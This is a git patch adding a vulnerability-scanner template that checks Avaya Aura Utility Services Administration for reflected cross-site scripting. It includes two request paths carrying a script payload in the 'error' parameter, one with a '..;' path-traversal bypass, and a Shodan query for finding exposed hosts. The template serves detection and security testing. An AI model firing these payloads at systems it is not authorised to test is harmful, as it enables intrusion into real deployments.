From 59077b2ddcaa057104f474935c0393c6a68a07e0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 3 Feb 2023 23:56:05 +0530 Subject: [PATCH] Create avaya-aura-xss.yaml --- vulnerabilities/avaya/avaya-aura-xss.yaml | 37 +++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 vulnerabilities/avaya/avaya-aura-xss.yaml diff --git a/vulnerabilities/avaya/avaya-aura-xss.yaml b/vulnerabilities/avaya/avaya-aura-xss.yaml new file mode 100644 index 0000000000..2637c5ff83 --- /dev/null +++ b/vulnerabilities/avaya/avaya-aura-xss.yaml @@ -0,0 +1,37 @@ +id: avaya-aura-xss + +info: + name: Avaya Aura Utility Services Administration - Cross Site Scripting + author: DhiyaneshDk + severity: medium + reference: + - https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/ + - https://download.avaya.com/css/public/documents/101076366 + metadata: + verified: "true" + shodan-query: html:"Avaya Aura" + tags: xss,avaya,aura,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e" + - "{{BaseURL}}/acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - '' + - 'Avaya Aura Device Services' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200